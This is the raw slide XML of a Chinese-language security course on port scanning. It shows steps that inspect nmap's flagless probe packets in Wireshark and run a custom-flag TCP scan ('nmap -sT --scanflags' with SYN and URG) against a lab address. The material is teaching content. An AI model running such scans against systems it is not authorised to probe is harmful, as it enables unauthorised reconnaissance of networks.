                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396230" y="207010"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>11.回到Wireshark工具查看nmap发送的数据包，这些发送的数据包中的None表示数据包中没有任何的标识，如图2-2-56所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396230" y="1129030"/>
            <a:ext cx="5267325" cy="4105275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961640" y="5243830"/>
            <a:ext cx="9066530" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                                                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-56 nmap发送的空标识数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>12.从扫描结果可以看出扫描出的21、22、80两个端口都是open|filtered状态，根据RFC793规定来看，这些端口是开放的，但是扫描结果以open|filtered标识，nmap无法区别端口处于open状态还是filtered状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义TCP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤八</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>08</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371465" y="1241108"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-scanflags SYNUGR 192.168.172.129”命令对目标主机进行自定义TCP扫描，例如使用SYN和URG标志的包对目标主机进行扫描，如图2-2-57所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371465" y="2439987"/>
            <a:ext cx="5248275" cy="2809875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371465" y="5249862"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-57 自定义TCP扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
